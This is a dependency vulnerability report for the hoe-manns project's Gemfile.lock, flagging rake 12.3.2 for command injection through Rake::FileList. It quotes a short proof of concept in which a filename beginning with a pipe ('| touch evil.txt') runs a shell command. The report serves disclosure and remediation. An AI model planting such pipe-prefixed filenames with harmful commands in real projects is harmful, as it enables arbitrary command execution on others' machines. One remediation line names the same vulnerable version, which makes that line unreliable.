saigkill/hoe-manns:Gemfile.lock

Vulnerabilities: 1 via 1 paths
Dependencies: 20
Source: GitHub
Commit: 530373ac

high severity

Arbitrary Code Injection

  • Vulnerable module: rake
  • Introduced through: hoe-manns@2.1.6

Detailed paths

  • Introduced through: saigkill/hoe-manns:Gemfile.lock@saigkill/hoe-manns#530373acc926351dd38fea10ed66df6c135c6078 hoe-manns@2.1.6 rake@12.3.2
    Remediation: Upgrade to hoe-manns@2.1.6.

Overview

rake is a Make-like program implemented in Ruby.

Affected versions of this package are vulnerable to Arbitrary Code Injection in Rake::FileList when supplying a filename that begins with the pipe character |.

PoC by Katsuhiko Yoshida

% ls -1
Gemfile
Gemfile.lock
poc_rake.rb
vendor
| touch evil.txt
% bundle exec ruby poc_rake.rb
["poc_rake.rb", "Gemfile", "Gemfile.lock", "| touch evil.txt", "vendor"]
poc_rake.rb:6:list.egrep(/something/)
Error while processing 'vendor': Is a directory @ io_fillbuf - fd:7 vendor
% ls -1
Gemfile
Gemfile.lock
evil.txt
poc_rake.rb
vendor
| touch evil.txt

Remediation

Upgrade rake to version 12.3.3 or higher.
